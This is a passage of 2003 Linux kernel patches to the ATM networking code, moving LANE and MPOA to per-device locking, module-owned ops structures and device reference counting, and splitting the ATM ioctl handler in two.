lec_arp_remove(struct lec_arp_table **lec_arp_tables, +static inline int lec_arp_remove(struct lec_priv *priv, struct lec_arp_table *to_remove); /* LANE2 functions */ static void lane2_associate_ind (struct net_device *dev, u8 *mac_address, @@ -95,8 +94,18 @@ static struct net_device *dev_lec[MAX_LEC_ITF]; /* This will be called from proc.c via function pointer */ -struct net_device **get_dev_lec (void) { - return &dev_lec[0]; +struct net_device *get_dev_lec(int itf) +{ + struct net_device *dev; + + if (itf >= MAX_LEC_ITF) + return NULL; + rtnl_lock(); + dev = dev_lec[itf]; + if (dev) + dev_hold(dev); + rtnl_unlock(); + return dev; } #if defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) @@ -432,7 +441,7 @@ break; case l_narp_req: /* LANE2: see 7.1.35 in the lane2 spec */ entry = lec_arp_find(priv, mesg->content.normal.mac_addr); - lec_arp_remove(priv->lec_arp_tables, entry); + lec_arp_remove(priv, entry); if (mesg->content.normal.no_source_le_narp) break; @@ -833,37 +842,28 @@ return i; } -void atm_lane_init_ops(struct atm_lane_ops *ops) +static struct atm_lane_ops __atm_lane_ops = { - ops->lecd_attach = lecd_attach; - ops->mcast_attach = lec_mcast_attach; - ops->vcc_attach = lec_vcc_attach; - ops->get_lecs = get_dev_lec; - - printk("lec.c: " __DATE__ " " __TIME__ " initialized\n"); - - return; -} + .lecd_attach = lecd_attach, + .mcast_attach = lec_mcast_attach, + .vcc_attach = lec_vcc_attach, + .get_lec = get_dev_lec, + .owner = THIS_MODULE +}; static int __init lane_module_init(void) { - extern struct atm_lane_ops atm_lane_ops; - - atm_lane_init_ops(&atm_lane_ops); - + atm_lane_ops_set(&__atm_lane_ops); + printk("lec.c: " __DATE__ " " __TIME__ " initialized\n"); return 0; } static void __exit lane_module_cleanup(void) { int i; - extern struct atm_lane_ops atm_lane_ops; struct lec_priv *priv; - atm_lane_ops.lecd_attach = NULL; - atm_lane_ops.mcast_attach = NULL; - atm_lane_ops.vcc_attach = NULL; - atm_lane_ops.get_lecs = NULL; + atm_lane_ops_set(NULL); for 
(i = 0; i < MAX_LEC_ITF; i++) { if (dev_lec[i] != NULL) { @@ -873,7 +873,7 @@ unregister_trdev(dev_lec[i]); else #endif - unregister_netdev(dev_lec[i]); + unregister_netdev(dev_lec[i]); kfree(dev_lec[i]); dev_lec[i] = NULL; } @@ -1073,6 +1073,7 @@ for (i=0;ilec_arp_tables[i] = NULL; } + spin_lock_init(&priv->lec_arp_lock); init_timer(&priv->lec_arp_timer); priv->lec_arp_timer.expires = jiffies+LEC_ARP_REFRESH_INTERVAL; priv->lec_arp_timer.data = (unsigned long)priv; @@ -1109,21 +1110,20 @@ * Insert entry to lec_arp_table * LANE2: Add to the end of the list to satisfy 8.1.13 */ -static __inline__ void -lec_arp_add(struct lec_arp_table **lec_arp_tables, - struct lec_arp_table *to_add) +static inline void +lec_arp_add(struct lec_priv *priv, struct lec_arp_table *to_add) { unsigned long flags; unsigned short place; struct lec_arp_table *tmp; - spin_lock_irqsave(&lec_arp_spinlock, flags); + spin_lock_irqsave(&priv->lec_arp_lock, flags); place = HASH(to_add->mac_addr[ETH_ALEN-1]); - tmp = lec_arp_tables[place]; + tmp = priv->lec_arp_tables[place]; to_add->next = NULL; if (tmp == NULL) - lec_arp_tables[place] = to_add; + priv->lec_arp_tables[place] = to_add; else { /* add to the end */ while (tmp->next) @@ -1131,7 +1131,7 @@ tmp->next = to_add; } - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); DPRINTK("LEC_ARP: Added entry:%2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", 0xff&to_add->mac_addr[0], 0xff&to_add->mac_addr[1], @@ -1142,8 +1142,8 @@ /* * Remove entry from lec_arp_table */ -static __inline__ int -lec_arp_remove(struct lec_arp_table **lec_arp_tables, +static inline int +lec_arp_remove(struct lec_priv *priv, struct lec_arp_table *to_remove) { unsigned long flags; @@ -1151,22 +1151,22 @@ struct lec_arp_table *tmp; int remove_vcc=1; - spin_lock_irqsave(&lec_arp_spinlock, flags); + spin_lock_irqsave(&priv->lec_arp_lock, flags); if (!to_remove) { - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + 
spin_unlock_irqrestore(&priv->lec_arp_lock, flags); return -1; } place = HASH(to_remove->mac_addr[ETH_ALEN-1]); - tmp = lec_arp_tables[place]; + tmp = priv->lec_arp_tables[place]; if (tmp == to_remove) { - lec_arp_tables[place] = tmp->next; + priv->lec_arp_tables[place] = tmp->next; } else { while(tmp && tmp->next != to_remove) { tmp = tmp->next; } if (!tmp) {/* Entry was not found */ - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); return -1; } } @@ -1180,7 +1180,7 @@ * ESI_FLUSH_PENDING, ESI_FORWARD_DIRECT */ for(place=0;placenext){ + for(tmp = priv->lec_arp_tables[place]; tmp != NULL; tmp = tmp->next) { if (memcmp(tmp->atm_addr, to_remove->atm_addr, ATM_ESA_LEN)==0) { remove_vcc=0; @@ -1193,7 +1193,7 @@ } skb_queue_purge(&to_remove->tx_wait); /* FIXME: good place for this? */ - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); DPRINTK("LEC_ARP: Removed entry:%2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", 0xff&to_remove->mac_addr[0], 0xff&to_remove->mac_addr[1], @@ -1389,7 +1389,7 @@ for (i=0;ilec_arp_tables[i];entry != NULL; entry=next) { next = entry->next; - lec_arp_remove(priv->lec_arp_tables, entry); + lec_arp_remove(priv, entry); kfree(entry); } } @@ -1429,7 +1429,7 @@ /* * Find entry by mac_address */ -static __inline__ struct lec_arp_table* +static inline struct lec_arp_table* lec_arp_find(struct lec_priv *priv, unsigned char *mac_addr) { @@ -1567,8 +1567,6 @@ lec_arp_check_expire(unsigned long data) { struct lec_priv *priv = (struct lec_priv *)data; - struct lec_arp_table **lec_arp_tables = - (struct lec_arp_table **)priv->lec_arp_tables; struct lec_arp_table *entry, *next; unsigned long now; unsigned long time_to_check; @@ -1584,7 +1582,7 @@ lec_arp_get(priv); now = jiffies; for(i=0;ilec_arp_tables[i]; entry != NULL; ) { if ((entry->flags) & LEC_REMOTE_FLAG && priv->topology_change) time_to_check=priv->forward_delay_time; @@ -1600,7 +1598,7 @@ /* 
Remove entry */ DPRINTK("LEC:Entry timed out\n"); next = entry->next; - lec_arp_remove(lec_arp_tables, entry); + lec_arp_remove(priv, entry); kfree(entry); entry = next; } else { @@ -1689,7 +1687,7 @@ if (!entry) { return priv->mcast_vcc; } - lec_arp_add(priv->lec_arp_tables, entry); + lec_arp_add(priv, entry); /* We want arp-request(s) to be sent */ entry->packets_flooded =1; entry->status = ESI_ARP_PENDING; @@ -1722,7 +1720,7 @@ if (!memcmp(atm_addr, entry->atm_addr, ATM_ESA_LEN) && (permanent || !(entry->flags & LEC_PERMANENT_FLAG))) { - lec_arp_remove(priv->lec_arp_tables, entry); + lec_arp_remove(priv, entry); kfree(entry); } lec_arp_put(priv); @@ -1788,7 +1786,7 @@ entry->status = ESI_FORWARD_DIRECT; memcpy(entry->mac_addr, mac_addr, ETH_ALEN); entry->last_used = jiffies; - lec_arp_add(priv->lec_arp_tables, entry); + lec_arp_add(priv, entry); } if (remoteflag) entry->flags|=LEC_REMOTE_FLAG; @@ -1808,7 +1806,7 @@ return; } entry->status = ESI_UNKNOWN; - lec_arp_add(priv->lec_arp_tables, entry); + lec_arp_add(priv, entry); /* Temporary, changes before end of function */ } memcpy(entry->atm_addr, atm_addr, ATM_ESA_LEN); @@ -2055,7 +2053,7 @@ to_add->old_push = vcc->push; vcc->push = lec_push; priv->mcast_vcc = vcc; - lec_arp_add(priv->lec_arp_tables, to_add); + lec_arp_add(priv, to_add); lec_arp_put(priv); return 0; } @@ -2073,7 +2071,7 @@ for(entry = priv->lec_arp_tables[i];entry; entry=next) { next = entry->next; if (vcc == entry->vcc) { - lec_arp_remove(priv->lec_arp_tables,entry); + lec_arp_remove(priv, entry); kfree(entry); if (priv->mcast_vcc == vcc) { priv->mcast_vcc = NULL; @@ -2153,23 +2151,23 @@ lec_arp_get(priv); entry = priv->lec_arp_empty_ones; if (vcc == entry->vcc) { - spin_lock_irqsave(&lec_arp_spinlock, flags); + spin_lock_irqsave(&priv->lec_arp_lock, flags); del_timer(&entry->timer); memcpy(entry->mac_addr, src, ETH_ALEN); entry->status = ESI_FORWARD_DIRECT; entry->last_used = jiffies; priv->lec_arp_empty_ones = entry->next; - 
spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); /* We might have got an entry */ if ((prev=lec_arp_find(priv,src))) { - lec_arp_remove(priv->lec_arp_tables, prev); + lec_arp_remove(priv, prev); kfree(prev); } - lec_arp_add(priv->lec_arp_tables, entry); + lec_arp_add(priv, entry); lec_arp_put(priv); return; } - spin_lock_irqsave(&lec_arp_spinlock, flags); + spin_lock_irqsave(&priv->lec_arp_lock, flags); prev = entry; entry = entry->next; while (entry && entry->vcc != vcc) { @@ -2179,7 +2177,7 @@ if (!entry) { DPRINTK("LEC_ARP: Arp_check_empties: entry not found!\n"); lec_arp_put(priv); - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); return; } del_timer(&entry->timer); @@ -2187,12 +2185,12 @@ entry->status = ESI_FORWARD_DIRECT; entry->last_used = jiffies; prev->next = entry->next; - spin_unlock_irqrestore(&lec_arp_spinlock, flags); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); if ((prev = lec_arp_find(priv, src))) { - lec_arp_remove(priv->lec_arp_tables,prev); + lec_arp_remove(priv, prev); kfree(prev); } - lec_arp_add(priv->lec_arp_tables,entry); + lec_arp_add(priv, entry); lec_arp_put(priv); } MODULE_LICENSE("GPL"); diff -Nru a/net/atm/lec.h b/net/atm/lec.h --- a/net/atm/lec.h Mon Jun 30 13:21:44 2003 +++ b/net/atm/lec.h Mon Jun 30 13:21:44 2003 @@ -64,7 +64,8 @@ int (*lecd_attach)(struct atm_vcc *vcc, int arg); int (*mcast_attach)(struct atm_vcc *vcc, int arg); int (*vcc_attach)(struct atm_vcc *vcc, void *arg); - struct net_device **(*get_lecs)(void); + struct net_device * (*get_lec)(int itf); + struct module *owner; }; /* @@ -101,7 +102,8 @@ establishes multiple Multicast Forward VCCs to us. This list collects all those VCCs. LANEv1 client has only one item in this list. These entries are not aged out. 
*/ atomic_t lec_arp_users; + spinlock_t lec_arp_lock; struct atm_vcc *mcast_vcc; /* Default Multicast Send VCC */ struct atm_vcc *lecd; struct timer_list lec_arp_timer; @@ -148,14 +150,16 @@ int lecd_attach(struct atm_vcc *vcc, int arg); int lec_vcc_attach(struct atm_vcc *vcc, void *arg); int lec_mcast_attach(struct atm_vcc *vcc, int arg); -struct net_device **get_dev_lec(void); +struct net_device *get_dev_lec(int itf); int make_lec(struct atm_vcc *vcc); int send_to_lecd(struct lec_priv *priv, atmlec_msg_type type, unsigned char *mac_addr, unsigned char *atm_addr, struct sk_buff *data); void lec_push(struct atm_vcc *vcc, struct sk_buff *skb); -void atm_lane_init(void); -void atm_lane_init_ops(struct atm_lane_ops *ops); +extern struct atm_lane_ops *atm_lane_ops; +void atm_lane_ops_set(struct atm_lane_ops *hook); +int try_atm_lane_ops(void); + #endif /* _LEC_H_ */ diff -Nru a/net/atm/mpc.c b/net/atm/mpc.c --- a/net/atm/mpc.c Mon Jun 30 13:21:44 2003 +++ b/net/atm/mpc.c Mon Jun 30 13:21:44 2003 @@ -251,12 +251,13 @@ static struct net_device *find_lec_by_itfnum(int itf) { - extern struct atm_lane_ops atm_lane_ops; /* in common.c */ - - if (atm_lane_ops.get_lecs == NULL) + struct net_device *dev; + if (!try_atm_lane_ops()) return NULL; - return atm_lane_ops.get_lecs()[itf]; /* FIXME: something better */ + dev = atm_lane_ops->get_lec(itf); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); + return dev; } static struct mpoa_client *alloc_mpc(void) @@ -777,9 +778,10 @@ if (mpc->dev) { /* check if the lec is LANE2 capable */ priv = (struct lec_priv *)mpc->dev->priv; - if (priv->lane_version < 2) + if (priv->lane_version < 2) { + dev_put(mpc->dev); mpc->dev = NULL; - else + } else priv->lane2_ops->associate_indicator = lane2_assoc_ind; } @@ -837,6 +839,7 @@ struct lec_priv *priv = (struct lec_priv *)mpc->dev->priv; priv->lane2_ops->associate_indicator = NULL; stop_mpc(mpc); + dev_put(mpc->dev); } mpc->in_ops->destroy_cache(mpc); @@ -973,6 +976,7 @@ } mpc->dev_num = priv->itfnum; 
mpc->dev = dev; + dev_hold(dev); dprintk("mpoa: (%s) was initialized\n", dev->name); break; case NETDEV_UNREGISTER: @@ -982,6 +986,7 @@ break; dprintk("mpoa: device (%s) was deallocated\n", dev->name); stop_mpc(mpc); + dev_put(mpc->dev); mpc->dev = NULL; break; case NETDEV_UP: @@ -1391,13 +1396,18 @@ return; } -void atm_mpoa_init_ops(struct atm_mpoa_ops *ops) +static struct atm_mpoa_ops __atm_mpoa_ops = { + .mpoad_attach = atm_mpoa_mpoad_attach, + .vcc_attach = atm_mpoa_vcc_attach, + .owner = THIS_MODULE +}; + +static __init int atm_mpoa_init(void) { - ops->mpoad_attach = atm_mpoa_mpoad_attach; - ops->vcc_attach = atm_mpoa_vcc_attach; + atm_mpoa_ops_set(&__atm_mpoa_ops); #ifdef CONFIG_PROC_FS - if(mpc_proc_init() != 0) + if (mpc_proc_init() != 0) printk(KERN_INFO "mpoa: failed to initialize /proc/mpoa\n"); else printk(KERN_INFO "mpoa: /proc/mpoa initialized\n"); @@ -1405,22 +1415,11 @@ printk("mpc.c: " __DATE__ " " __TIME__ " initialized\n"); - return; -} - -#ifdef MODULE -int init_module(void) -{ - extern struct atm_mpoa_ops atm_mpoa_ops; - - atm_mpoa_init_ops(&atm_mpoa_ops); - return 0; } -void cleanup_module(void) +void __exit atm_mpoa_cleanup(void) { - extern struct atm_mpoa_ops atm_mpoa_ops; struct mpoa_client *mpc, *tmp; struct atm_mpoa_qos *qos, *nextqos; struct lec_priv *priv; @@ -1435,8 +1434,7 @@ del_timer(&mpc_timer); unregister_netdevice_notifier(&mpoa_notifier); - atm_mpoa_ops.mpoad_attach = NULL; - atm_mpoa_ops.vcc_attach = NULL; + atm_mpoa_ops_set(NULL); mpc = mpcs; mpcs = NULL; @@ -1471,5 +1469,8 @@ return; } -#endif /* MODULE */ + +module_init(atm_mpoa_init); +module_exit(atm_mpoa_cleanup); + MODULE_LICENSE("GPL"); diff -Nru a/net/atm/mpc.h b/net/atm/mpc.h --- a/net/atm/mpc.h Mon Jun 30 13:21:44 2003 +++ b/net/atm/mpc.h Mon Jun 30 13:21:44 2003 @@ -48,11 +48,13 @@ struct atm_mpoa_ops { int (*mpoad_attach)(struct atm_vcc *vcc, int arg); /* attach mpoa daemon */ int (*vcc_attach)(struct atm_vcc *vcc, long arg); /* attach shortcut vcc */ + struct 
module *owner; }; /* Boot/module initialization function */ -void atm_mpoa_init(void); -void atm_mpoa_init_ops(struct atm_mpoa_ops *ops); +extern struct atm_mpoa_ops *atm_mpoa_ops; +int try_atm_mpoa_ops(void); +void atm_mpoa_ops_set(struct atm_mpoa_ops *hook); /* MPOA QoS operations */ struct atm_mpoa_qos *atm_mpoa_add_qos(uint32_t dst_ip, struct atm_qos *qos); diff -Nru a/net/atm/proc.c b/net/atm/proc.c --- a/net/atm/proc.c Mon Jun 30 13:21:44 2003 +++ b/net/atm/proc.c Mon Jun 30 13:21:44 2003 @@ -47,7 +47,6 @@ #if defined(CONFIG_ATM_LANE) || defined(CONFIG_ATM_LANE_MODULE) #include "lec.h" #include "lec_arpc.h" -extern struct atm_lane_ops atm_lane_ops; /* in common.c */ #endif static ssize_t proc_dev_atm_read(struct file *file,char *buf,size_t count, @@ -479,57 +478,72 @@ #if defined(CONFIG_ATM_LANE) || defined(CONFIG_ATM_LANE_MODULE) static int atm_lec_info(loff_t pos,char *buf) { + unsigned long flags; struct lec_priv *priv; struct lec_arp_table *entry; int i, count, d, e; - struct net_device **dev_lec; + struct net_device *dev; if (!pos) { return sprintf(buf,"Itf MAC ATM destination" " Status Flags " "VPI/VCI Recv VPI/VCI\n"); } - if (atm_lane_ops.get_lecs == NULL) + if (!try_atm_lane_ops()) return 0; /* the lane module is not there yet */ - else - dev_lec = atm_lane_ops.get_lecs(); count = pos; - for(d=0;dpriv)) continue; - for(i=0;ilec_arp_tables[i]; - for(;entry;entry=entry->next) { - if (--count) continue; - e=sprintf(buf,"%s ", - dev_lec[d]->name); - lec_info(entry,buf+e); + for(d = 0; d < MAX_LEC_ITF; d++) { + dev = atm_lane_ops->get_lec(d); + if (!dev || !(priv = (struct lec_priv *) dev->priv)) + continue; + spin_lock_irqsave(&priv->lec_arp_lock, flags); + for(i = 0; i < LEC_ARP_TABLE_SIZE; i++) { + for(entry = priv->lec_arp_tables[i]; entry; entry = entry->next) { + if (--count) + continue; + e = sprintf(buf,"%s ", dev->name); + lec_info(entry, buf+e); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); + dev_put(dev); + 
__MOD_DEC_USE_COUNT(atm_lane_ops->owner); return strlen(buf); } } - for(entry=priv->lec_arp_empty_ones; entry; - entry=entry->next) { - if (--count) continue; - e=sprintf(buf,"%s ",dev_lec[d]->name); + for(entry = priv->lec_arp_empty_ones; entry; entry = entry->next) { + if (--count) + continue; + e = sprintf(buf,"%s ", dev->name); lec_info(entry, buf+e); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); + dev_put(dev); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); return strlen(buf); } - for(entry=priv->lec_no_forward; entry; - entry=entry->next) { - if (--count) continue; - e=sprintf(buf,"%s ",dev_lec[d]->name); + for(entry = priv->lec_no_forward; entry; entry=entry->next) { + if (--count) + continue; + e = sprintf(buf,"%s ", dev->name); lec_info(entry, buf+e); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); + dev_put(dev); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); return strlen(buf); } - for(entry=priv->mcast_fwds; entry; - entry=entry->next) { - if (--count) continue; - e=sprintf(buf,"%s ",dev_lec[d]->name); + for(entry = priv->mcast_fwds; entry; entry = entry->next) { + if (--count) + continue; + e = sprintf(buf,"%s ", dev->name); lec_info(entry, buf+e); + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); + dev_put(dev); + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); return strlen(buf); } + spin_unlock_irqrestore(&priv->lec_arp_lock, flags); + dev_put(dev); } + __MOD_DEC_USE_COUNT(atm_lane_ops->owner); return 0; } #endif [atm]: split atm_ioctl into vcc_ioctl and atm_dev_ioctl # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. 
# This patch includes the following deltas: # ChangeSet 1.1016 -> 1.1017 # net/atm/pvc.c 1.4 -> 1.5 # net/atm/resources.c 1.6 -> 1.7 # net/atm/svc.c 1.4 -> 1.5 # net/atm/common.h 1.2 -> 1.3 # net/atm/resources.h 1.3 -> 1.4 # net/atm/common.c 1.18 -> 1.19 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/27 davem@nuts.ninka.net 1.1011.1.19 # [NET]: net/bluetooth/cmtp/core.c needs linux/init.h # -------------------------------------------- # 03/06/27 davem@nuts.ninka.net 1.1011.1.20 # [NET]: Scale DST/ipv6 intervals like we did for ipv4. # -------------------------------------------- # 03/06/28 chas@relax.cmf.nrl.navy.mil 1.1017 # svc.c, resources.h, resources.c, pvc.c, common.h, common.c: # split atm_ioctl into vcc_ioctl and atm_dev_ioctl # -------------------------------------------- # diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 30 13:21:27 2003 +++ b/net/atm/common.c Mon Jun 30 13:21:27 2003 @@ -564,129 +564,51 @@ } -static void copy_aal_stats(struct k_atm_aal_stats *from, - struct atm_aal_stats *to) +int vcc_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg) { -#define __HANDLE_ITEM(i) to->i = atomic_read(&from->i) - __AAL_STAT_ITEMS -#undef __HANDLE_ITEM -} - - -static void subtract_aal_stats(struct k_atm_aal_stats *from, - struct atm_aal_stats *to) -{ -#define __HANDLE_ITEM(i) atomic_sub(to->i,&from->i) - __AAL_STAT_ITEMS -#undef __HANDLE_ITEM -} - - -static int fetch_stats(struct atm_dev *dev,struct atm_dev_stats *arg,int zero) -{ - struct atm_dev_stats tmp; - int error = 0; - - copy_aal_stats(&dev->stats.aal0,&tmp.aal0); - copy_aal_stats(&dev->stats.aal34,&tmp.aal34); - copy_aal_stats(&dev->stats.aal5,&tmp.aal5); - if (arg) error = copy_to_user(arg,&tmp,sizeof(tmp)); - if (zero && !error) { - subtract_aal_stats(&dev->stats.aal0,&tmp.aal0); - subtract_aal_stats(&dev->stats.aal34,&tmp.aal34); - subtract_aal_stats(&dev->stats.aal5,&tmp.aal5); - } - return error 
? -EFAULT : 0; -} - - -int atm_ioctl(struct socket *sock,unsigned int cmd,unsigned long arg) -{ - struct atm_dev *dev; - struct list_head *p; struct atm_vcc *vcc; - int *tmp_buf, *tmp_p; - void *buf; - int error,len,size,number, ret_val; + int error; - ret_val = 0; vcc = ATM_SD(sock); switch (cmd) { case SIOCOUTQ: if (sock->state != SS_CONNECTED || - !test_bit(ATM_VF_READY,&vcc->flags)) { - ret_val = -EINVAL; + !test_bit(ATM_VF_READY, &vcc->flags)) { + error = -EINVAL; goto done; } - ret_val = put_user(vcc->sk->sndbuf- - atomic_read(&vcc->sk->wmem_alloc), - (int *) arg) ? -EFAULT : 0; + error = put_user(vcc->sk->sndbuf- + atomic_read(&vcc->sk->wmem_alloc), + (int *) arg) ? -EFAULT : 0; goto done; case SIOCINQ: { struct sk_buff *skb; if (sock->state != SS_CONNECTED) { - ret_val = -EINVAL; + error = -EINVAL; goto done; } skb = skb_peek(&vcc->sk->receive_queue); - ret_val = put_user(skb ? skb->len : 0,(int *) arg) - ? -EFAULT : 0; - goto done; - } - case ATM_GETNAMES: - if (get_user(buf, - &((struct atm_iobuf *) arg)->buffer)) { - ret_val = -EFAULT; - goto done; - } - if (get_user(len, - &((struct atm_iobuf *) arg)->length)) { - ret_val = -EFAULT; + error = put_user(skb ? skb->len : 0, + (int *) arg) ? -EFAULT : 0; goto done; } - size = 0; - spin_lock(&atm_dev_lock); - list_for_each(p, &atm_devs) - size += sizeof(int); - if (size > len) { - spin_unlock(&atm_dev_lock); - ret_val = -E2BIG; - goto done; - } - tmp_buf = kmalloc(size, GFP_ATOMIC); - if (!tmp_buf) { - spin_unlock(&atm_dev_lock); - ret_val = -ENOMEM; - goto done; - } - tmp_p = tmp_buf; - list_for_each(p, &atm_devs) { - dev = list_entry(p, struct atm_dev, dev_list); - *tmp_p++ = dev->number; - } - spin_unlock(&atm_dev_lock); - ret_val = ((copy_to_user(buf, tmp_buf, size)) || - put_user(size, &((struct atm_iobuf *) arg)->length) - ) ? 
-EFAULT : 0; - kfree(tmp_buf); - goto done; case SIOCGSTAMP: /* borrowed from IP */ if (!vcc->sk->stamp.tv_sec) { - ret_val = -ENOENT; + error = -ENOENT; goto done; } - ret_val = copy_to_user((void *) arg, &vcc->sk->stamp, - sizeof(struct timeval)) ? -EFAULT : 0; + error = copy_to_user((void *) arg, &vcc->sk->stamp, + sizeof(struct timeval)) ? -EFAULT : 0; goto done; case ATM_SETSC: printk(KERN_WARNING "ATM_SETSC is obsolete\n"); - ret_val = 0; + error = 0; goto done; case ATMSIGD_CTRL: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } /* @@ -697,28 +619,28 @@ * have the same privledges that /proc/kcore needs */ if (!capable(CAP_SYS_RAWIO)) { - ret_val = -EPERM; + error = -EPERM; goto done; } error = sigd_attach(vcc); - if (!error) sock->state = SS_CONNECTED; - ret_val = error; + if (!error) + sock->state = SS_CONNECTED; goto done; #if defined(CONFIG_ATM_CLIP) || defined(CONFIG_ATM_CLIP_MODULE) case SIOCMKCLIP: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_clip_ops()) { - ret_val = atm_clip_ops->clip_create(arg); + error = atm_clip_ops->clip_create(arg); __MOD_DEC_USE_COUNT(atm_clip_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMARPD_CTRL: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } #if defined(CONFIG_ATM_CLIP_MODULE) @@ -730,48 +652,47 @@ __MOD_DEC_USE_COUNT(atm_clip_ops->owner); if (!error) sock->state = SS_CONNECTED; - ret_val = error; } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMARP_MKIP: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_clip_ops()) { - ret_val = atm_clip_ops->clip_mkip(vcc, arg); + error = atm_clip_ops->clip_mkip(vcc, arg); __MOD_DEC_USE_COUNT(atm_clip_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMARP_SETENTRY: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if 
(try_atm_clip_ops()) { - ret_val = atm_clip_ops->clip_setentry(vcc, arg); + error = atm_clip_ops->clip_setentry(vcc, arg); __MOD_DEC_USE_COUNT(atm_clip_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMARP_ENCAP: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_clip_ops()) { - ret_val = atm_clip_ops->clip_encap(vcc, arg); + error = atm_clip_ops->clip_encap(vcc, arg); __MOD_DEC_USE_COUNT(atm_clip_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; #endif #if defined(CONFIG_ATM_LANE) || defined(CONFIG_ATM_LANE_MODULE) case ATMLEC_CTRL: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } #if defined(CONFIG_ATM_LANE_MODULE) @@ -783,37 +704,36 @@ __MOD_DEC_USE_COUNT(atm_lane_ops->owner); if (error >= 0) sock->state = SS_CONNECTED; - ret_val = error; } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMLEC_MCAST: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_lane_ops()) { - ret_val = atm_lane_ops->mcast_attach(vcc, (int) arg); + error = atm_lane_ops->mcast_attach(vcc, (int) arg); __MOD_DEC_USE_COUNT(atm_lane_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; case ATMLEC_DATA: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_lane_ops()) { - ret_val = atm_lane_ops->vcc_attach(vcc, (void *) arg); + error = atm_lane_ops->vcc_attach(vcc, (void *) arg); __MOD_DEC_USE_COUNT(atm_lane_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; #endif #if defined(CONFIG_ATM_MPOA) || defined(CONFIG_ATM_MPOA_MODULE) case ATMMPC_CTRL: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } #if defined(CONFIG_ATM_MPOA_MODULE) @@ -825,63 +745,62 @@ __MOD_DEC_USE_COUNT(atm_mpoa_ops->owner); if (error >= 0) sock->state = SS_CONNECTED; - ret_val = error; } else - ret_val = -ENOSYS; + error = -ENOSYS; goto 
done; case ATMMPC_DATA: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (try_atm_mpoa_ops()) { - ret_val = atm_mpoa_ops->vcc_attach(vcc, arg); + error = atm_mpoa_ops->vcc_attach(vcc, arg); __MOD_DEC_USE_COUNT(atm_mpoa_ops->owner); } else - ret_val = -ENOSYS; + error = -ENOSYS; goto done; #endif #if defined(CONFIG_ATM_TCP) || defined(CONFIG_ATM_TCP_MODULE) case SIOCSIFATMTCP: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (!atm_tcp_ops.attach) { - ret_val = -ENOPKG; + error = -ENOPKG; goto done; } - fops_get (&atm_tcp_ops); - error = atm_tcp_ops.attach(vcc,(int) arg); - if (error >= 0) sock->state = SS_CONNECTED; - else fops_put (&atm_tcp_ops); - ret_val = error; + fops_get(&atm_tcp_ops); + error = atm_tcp_ops.attach(vcc, (int) arg); + if (error >= 0) + sock->state = SS_CONNECTED; + else + fops_put (&atm_tcp_ops); goto done; case ATMTCP_CREATE: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (!atm_tcp_ops.create_persistent) { - ret_val = -ENOPKG; + error = -ENOPKG; goto done; } error = atm_tcp_ops.create_persistent((int) arg); - if (error < 0) fops_put (&atm_tcp_ops); - ret_val = error; + if (error < 0) + fops_put(&atm_tcp_ops); goto done; case ATMTCP_REMOVE: if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; + error = -EPERM; goto done; } if (!atm_tcp_ops.remove_persistent) { - ret_val = -ENOPKG; + error = -ENOPKG; goto done; } error = atm_tcp_ops.remove_persistent((int) arg); - fops_put (&atm_tcp_ops); - ret_val = error; + fops_put(&atm_tcp_ops); goto done; #endif default: @@ -889,183 +808,23 @@ } #if defined(CONFIG_PPPOATM) || 